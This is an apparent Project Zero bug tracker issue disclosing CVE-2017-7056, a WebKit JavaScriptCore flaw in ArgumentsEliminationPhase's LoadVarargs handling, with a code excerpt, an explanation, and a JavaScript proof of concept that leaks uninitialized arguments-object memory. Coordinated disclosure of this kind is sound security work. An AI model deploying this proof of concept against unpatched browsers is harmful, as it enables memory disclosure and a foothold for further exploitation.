New issue
Advanced search Search tips

Issue 1262 link

Starred by 3 users

Issue metadata

Status: Fixed
Owner:
Closed: Jul 2017
Cc:



Sign in to add a comment

WebKit: JSC: Incorrect LoadVarargs handling in ArgumentsEliminationPhase::transform

Project Member Reported by lokihardt@google.com, May 17 2017

Issue description

Here is a snippet of ArgumentsEliminationPhase::transform
    case LoadVarargs:
        ...
        if (candidate->op() == PhantomNewArrayWithSpread || candidate->op() == PhantomSpread) {
            ...
            if (argumentCountIncludingThis <= varargsData->limit) {
                storeArgumentCountIncludingThis(argumentCountIncludingThis);
                // store arguments
                ...
            }

            node->remove();
            node->origin.exitOK = canExit;
            break;
        }

Whether or not the "argumentCountIncludingThis <= varargsData->limit" condition is satisfied, it removes the |node| variable and exits the switch statement. So in this case the condition is not satisfied, the arguments object created by the following code(CreateDirectArguments in the PoC) may have uninitialized values and length.

PoC:
const kArgsLength = 0x101;

let buggy = null;
function inlineFunc() {
    if (arguments.length != kArgsLength) {
        buggy = arguments;
    }
}

class ClassForInine extends inlineFunc {
}

function sleep(ms) {
    let start = new Date();
    while (new Date() - start < ms);
}

function main() {
    let args = new Array(kArgsLength);
    args.fill(333 + 1);
    args = args.join(', ');

    let opt = new Function(`(() => {
        new ClassForInine(${args});
    })();`);

    for (let i = 0; i < 0x100000; i++) {
        opt();

        if (i === 0x3000)
            sleep(1000);

        if (buggy) {
            print('buggy.length: ' + buggy.length);
            break;
        }
    }

    for (let i = 0, n = buggy.length; i < n; i++) {
        print(buggy[i]);
    }
}

main();

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 
Project Member

Comment 1 by lokihardt@google.com, May 17 2017

Project Member

Comment 2 by lokihardt@google.com, Jul 13 2017

Labels: CVE-2017-7056
Project Member

Comment 3 by lokihardt@google.com, Jul 24 2017

Labels: -Restrict-View-Commit
Status: Fixed (was: New)

Sign in to add a comment